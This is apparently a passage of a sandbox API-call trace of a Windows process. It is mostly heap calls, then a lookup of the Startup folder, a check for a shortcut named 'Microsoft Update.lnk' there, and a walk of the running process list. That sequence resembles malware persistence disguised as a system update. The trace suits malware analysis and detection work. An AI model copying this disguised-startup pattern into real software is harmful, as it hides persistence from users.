Size=0x10) returned 0x34aa4d8 [0321.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0321.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0321.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0321.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0321.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0321.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0321.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0321.223] FreeLibrary (hLibModule=0x74f40000) returned 1 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0321.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0321.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0321.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0321.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0321.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0321.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0321.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0321.225] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0321.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0321.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0321.225] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0321.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0321.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0321.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0321.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0321.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0321.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0321.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0321.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0321.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0321.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0321.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0321.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0321.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0321.227] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0321.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0321.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0321.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0321.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0321.228] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0321.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0321.228] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0321.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0321.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0321.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0321.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0321.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0321.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0321.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0321.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0321.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0321.230] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0321.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0321.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0321.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0321.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0321.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0321.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0321.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0321.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0321.230] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0321.230] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0321.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0321.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0321.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0321.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0321.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0321.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0321.232] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0321.233] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0321.234] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0321.234] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0321.235] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0321.245] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0321.246] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0321.246] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0321.247] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0321.248] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0321.248] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.249] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.249] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.250] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.251] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.251] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0321.252] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.253] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.253] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0321.254] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0321.254] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0321.255] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0321.256] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, 